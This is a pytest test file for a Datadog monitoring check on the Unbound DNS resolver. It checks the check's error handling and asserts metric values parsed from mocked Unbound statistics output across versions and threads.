refs/heads/master
| 2023-08-31T04:01:33.555722
| 2023-08-30T18:51:09
| 2023-08-30T18:51:09
| 51,574,196
| 221
| 667
|
BSD-3-Clause
| 2023-09-14T16:07:56
| 2016-02-12T07:55:28
|
Python
|
UTF-8
|
Python
| false
| false
| 58,545
|
py
|
test_unbound.py
|
import os
import mock
import pytest
from datadog_checks.base import AgentCheck, ConfigurationError
from datadog_checks.unbound import UnboundCheck
def test_nonexistent_unbound_control():
check = UnboundCheck('unbound', {}, {})
with mock.patch('datadog_checks.unbound.unbound.which', return_value=None):
with pytest.raises(ConfigurationError, match='executable not found: .*'):
check.check({})
def test_no_sudo(mock_which):
check = UnboundCheck('unbound', {}, {})
with mock.patch('datadog_checks.unbound.unbound.os.system', return_value=1):
with pytest.raises(Exception, match='.* does not have sudo access'):
check.check({'use_sudo': True})
def test_unbound_on_root_path_but_not_current_users_path(aggregator, env_setup):
check = UnboundCheck('unbound', {}, {})
# Simulate success with the setsid sudo check, and output from unbound-control. This
# test focuses on sudo which can work even when setsid sudo doesn't.
#
# Unfortunately on some systems sudo may require entering a password...
with mock.patch('datadog_checks.unbound.unbound.os.system', return_value=0):
with mock.patch('datadog_checks.unbound.UnboundCheck.call_unbound_control', return_value='foo=0'):
# env_setup removes paths with sbin from the PATH for the current user, so use
# a program in e.g. /sbin for sudo. Note that unbound-control is not
# necessarily (and probably not) installed in the test environment, so use
# something that is.
sudo_only_executable = '/sbin/ifconfig'
assert os.path.isfile(sudo_only_executable)
check.check({'use_sudo': True, 'unbound_control': sudo_only_executable})
# Ignore the actual metrics...Consider the test successful if we see an ok service
# check
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
def test_nonexistent_unbound_control_with_sudo(aggregator):
check = UnboundCheck('unbound', {}, {})
# Choose an unbound_control executable that doesn't exist under sudo.
non_existent_executable = '/this/does/not/exist'
# This makes sure it doesn't exist at all, which is stronger, but helps home in on
# errors in the test vs. errors in the code.
assert not os.path.isfile(non_existent_executable)
# Simulate success with the setsid sudo check. This test focuses on sudo which can
# work even when setsid sudo doesn't.
#
# Unfortunately on some systems sudo may require entering a password...
with mock.patch('datadog_checks.unbound.unbound.os.system', return_value=0):
with pytest.raises(ConfigurationError, match='executable not found: .*'):
check.check({'use_sudo': True, 'unbound_control': non_existent_executable})
def test_unbound_control_exception(aggregator, mock_which):
check = UnboundCheck('unbound', {}, {})
with mock.patch('datadog_checks.unbound.unbound.get_subprocess_output') as mock_unbound:
message = 'arbitrary exception'
mock_unbound.side_effect = Exception(message)
with pytest.raises(Exception, match='Unable to get unbound stats: {}'.format(message)):
check.check({})
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.CRITICAL)
def test_unbound_control_non_zero_return_code(aggregator, mock_which):
check = UnboundCheck('unbound', {}, {})
return_code = 1
with mock.patch('datadog_checks.unbound.unbound.get_subprocess_output', return_value=('', '', return_code)):
with pytest.raises(Exception, match='failed, return code: {}'.format(return_code)):
check.check({})
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.CRITICAL)
def test_unbound_control_empty_output(aggregator, mock_which):
check = UnboundCheck('unbound', {}, {})
with mock.patch('datadog_checks.unbound.unbound.get_subprocess_output', return_value=('', '', 0)):
with pytest.raises(Exception, match='no output from .*'):
check.check({})
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.CRITICAL)
def test_wacky_output(aggregator, mock_which):
check = UnboundCheck('unbound', {}, {})
output = 'foo'
with mock.patch('datadog_checks.unbound.unbound.get_subprocess_output', return_value=(output, '', 0)):
with pytest.raises(Exception, match="unable to parse output '{}'".format(output)):
check.check({})
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.CRITICAL)
def test_basic_stats_1_4_22(aggregator, mock_which, mock_basic_stats_1_4_22):
check = UnboundCheck('unbound', {}, {})
tags = ['foo:bar']
check.check({'tags': tags})
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
assert_basic_stats_1_4_22(aggregator, tags)
aggregator.assert_all_metrics_covered()
def test_basic_stats_1_9_2(aggregator, mock_which, mock_basic_stats_1_9_2):
check = UnboundCheck('unbound', {}, {})
tags = ['foo:bar']
check.check({'tags': tags})
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
assert_basic_stats_1_9_2(aggregator, tags)
aggregator.assert_all_metrics_covered()
def test_multithread_stats(aggregator, mock_which, mock_multithread_stats):
check = UnboundCheck('unbound', {}, {})
tags = ['foo:bar']
check.check({'tags': tags})
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
assert_multithread_stats(aggregator, tags)
aggregator.assert_all_metrics_covered()
def test_extended_stats_1_4_22(aggregator, mock_which, mock_extended_stats_1_4_22):
check = UnboundCheck('unbound', {}, {})
tags = ['foo:bar']
check.check({'tags': tags})
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
assert_extended_stats_1_4_22(aggregator, tags)
aggregator.assert_all_metrics_covered()
def test_extended_stats_1_9_2(aggregator, mock_which, mock_extended_stats_1_9_2):
check = UnboundCheck('unbound', {}, {})
tags = ['foo:bar']
check.check({'tags': tags})
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
assert_extended_stats_1_9_2(aggregator, tags)
aggregator.assert_all_metrics_covered()
def test_hostname_with_port(aggregator, mock_which, mock_basic_stats_1_4_22):
instance = {"host": "localhost@53"}
check = UnboundCheck('unbound', {}, [instance])
check.check(instance)
# Ignore the actual metrics...Consider the test successful if we see an ok service
# check
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
def test_hostname_without_port(aggregator, mock_which, mock_basic_stats_1_4_22):
instance = {"host": "localhost"}
check = UnboundCheck('unbound', {}, [instance])
check.check(instance)
# Ignore the actual metrics...Consider the test successful if we see an ok service
# check
aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
def assert_basic_stats_1_9_2(aggregator, tags):
thread0_tags = tags + ['thread:0']
aggregator.assert_metric(
'unbound.thread.num.queries', value=1, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.queries_ip_ratelimited',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachehits', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss', value=1, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.zero_ttl', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=1,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0.275972,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.tcpusage', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
thread1_tags = tags + ['thread:1']
aggregator.assert_metric(
'unbound.thread.num.queries', value=1, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.queries_ip_ratelimited',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachehits', value=1, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.zero_ttl', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.tcpusage', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
thread2_tags = tags + ['thread:2']
aggregator.assert_metric(
'unbound.thread.num.queries', value=1, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.queries_ip_ratelimited',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachehits', value=1, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.zero_ttl', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.tcpusage', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.num.queries', value=3, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.queries_ip_ratelimited',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.total.num.cachehits', value=2, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.cachemiss', value=1, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.prefetch', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.zero_ttl', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.recursivereplies', value=1, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.requestlist.avg', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.max', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.overwritten',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.exceeded', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.current.all',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.current.user',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.avg',
value=0.275972,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.median', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.tcpusage', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.now', value=1561493959.739239, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.up', value=18.262188, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.elapsed', value=18.262188, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
def assert_basic_stats_1_4_22(aggregator, tags):
# Rather than write code to parse stats.basic and wrestle with potential
# bugs there, let's manually craft the assertions. I don't expect
# stats.basic to change very often.
thread_tags = tags + ['thread:0']
aggregator.assert_metric(
'unbound.thread.num.queries',
value=178275254,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachehits',
value=166270813,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss',
value=12004441,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=12004441,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0.395844,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=9,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0.010833,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0.00169968,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.num.queries', value=178275254, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.cachehits', value=166270813, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.cachemiss', value=12004441, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.prefetch', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.recursivereplies',
value=12004441,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.total.requestlist.avg', value=0.395844, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.max', value=9, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.overwritten',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.exceeded', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.current.all',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.current.user',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.avg',
value=0.010833,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.median',
value=0.00169968,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.time.now', value=1558048773.969199, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.up', value=49144398.166967, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.elapsed', value=2082502.474876, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
def assert_multithread_stats(aggregator, tags):
thread_tags = tags + ['thread:11']
aggregator.assert_metric(
'unbound.thread.num.queries',
value=178275254,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachehits',
value=166270813,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss',
value=12004441,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=12004441,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0.395844,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=9,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0.010833,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0.00169968,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
def assert_extended_stats_1_4_22(aggregator, tags):
thread_tags = tags + ['thread:0']
aggregator.assert_metric(
'unbound.thread.num.queries',
value=204240518,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachehits',
value=190406406,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss',
value=13834112,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=13834112,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0.272588,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=14,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0.005766,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0.00165754,
tags=thread_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.num.queries', value=204240518, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.cachehits', value=190406406, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.cachemiss', value=13834112, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.prefetch', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.recursivereplies',
value=13834112,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.total.requestlist.avg', value=0.272588, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.max', value=14, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.overwritten',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.exceeded', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.current.all',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.current.user',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.avg',
value=0.005766,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.median',
value=0.00165754,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.time.now', value=1558634276.538588, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.up', value=56320542.076365, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.elapsed', value=56320542.076365, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
# extended stats start here
aggregator.assert_metric(
'unbound.mem.total.sbrk', value=10919936, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.cache.rrset', value=249585, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.cache.message', value=618825, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.mod.iterator', value=16532, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.mod.validator', value=66344, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.num.query.type',
value=63589866,
tags=tags + ['query_type:A'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.type',
value=30,
tags=tags + ['query_type:CNAME'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.type',
value=2436,
tags=tags + ['query_type:PTR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.type',
value=133376595,
tags=tags + ['query_type:AAAA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.type',
value=7271591,
tags=tags + ['query_type:SRV'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.class',
value=204240518,
tags=tags + ['query_class:IN'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.opcode',
value=204240518,
tags=tags + ['opcode:QUERY'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.tcp', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.ipv6', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:QR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:AA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:TC'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=204240518,
tags=tags + ['flag:RD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:RA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags', value=0, tags=tags + ['flag:Z'], count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:AD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:CD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.edns.present', value=187, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
